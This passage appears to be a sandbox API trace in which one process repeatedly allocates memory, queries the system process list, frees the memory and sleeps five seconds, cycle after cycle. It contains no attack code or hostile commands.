[0202.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0202.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0202.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0202.907] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0202.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0202.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0203.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0203.080] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0203.084] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0203.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0203.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0203.177] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0203.178] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0203.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0203.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0203.274] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0203.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0203.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0203.437] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0203.438] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0203.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0203.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0203.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0203.583] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0203.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0203.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0203.669] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0203.670] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0203.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0203.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0203.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0203.816] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0203.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0203.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0203.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0203.926] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0203.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0203.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0204.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0204.014] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0204.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0204.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0204.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0204.110] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0204.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0204.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0204.204] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0204.205] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0204.208] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0204.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0204.343] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0204.344] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0204.348] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0204.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0204.543] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0204.544] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0204.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0204.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0204.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0204.673] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0204.676] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0204.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0204.785] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0204.786] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0204.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0204.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0204.903] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0204.904] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0204.909] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0204.910] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0205.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0205.013] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0205.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0205.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0205.117] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0205.118] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0205.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0205.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0205.235] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0205.236] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0205.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0205.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0205.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0205.370] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0205.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0205.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0205.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0205.532] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0205.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0205.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0205.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0205.651] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0205.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0205.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0205.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0205.780] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0205.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0205.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0205.884] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0205.885] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0205.896] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0205.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0205.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0205.981] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0205.986] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0205.986] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0206.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0206.075] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0206.084] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0206.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0206.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0206.227] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0206.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0206.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0206.342] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0206.343] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0206.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0206.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0206.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0206.510] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0206.516] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0206.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0206.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0206.603] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0206.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0206.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0206.699] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0206.699] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0206.703] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0206.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0206.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0206.827] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0206.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0206.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0206.916] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0206.916] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0206.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0206.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0207.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0207.027] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0207.031] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0207.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0207.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0207.116] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0207.125] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0207.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0207.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0207.506] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0207.517] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0207.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0207.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0207.645] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0207.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0207.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0207.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0207.783] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0207.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, 